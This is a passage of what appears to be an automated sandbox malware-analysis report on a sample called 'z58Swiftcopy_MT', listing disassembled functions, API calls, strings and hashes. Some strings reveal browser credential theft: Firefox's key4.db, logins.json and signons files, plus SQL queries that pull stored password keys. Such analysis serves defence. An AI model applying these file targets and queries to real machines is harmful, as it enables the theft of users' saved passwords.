                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                                                      • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                                      • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                                      • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                                                                                      • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                                                                      Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2998058495-0
                                                                                                                                                                                                                                      • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                                                                      Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                        • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                                                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                                                                      • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                                                                        • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                                                                        • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                                      • API String ID: 2303586283-933021314
                                                                                                                                                                                                                                      • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                                                                                      • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                                                                      Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                                      • API String ID: 231171946-2189169393
                                                                                                                                                                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                                                                      Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                      • API String ID: 633282248-1996832678
                                                                                                                                                                                                                                      • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                                                                      Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                                                      • , xrefs: 00406834
                                                                                                                                                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                                      • key4.db, xrefs: 00406756
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                                      • API String ID: 3614188050-3983245814
                                                                                                                                                                                                                                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                                                                      Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A973
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A996
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                                                                                        • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`-v,00000000,?,?,0040A7BE,00000001,0044CBC0,762D0A60), ref: 00406D4D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                      • API String ID: 710961058-601624466
                                                                                                                                                                                                                                      • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                      • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                                                                      Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                      • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                                      • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                                                                      Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                                      • API String ID: 2003275452-3138536805
                                                                                                                                                                                                                                      • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                                                                      Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
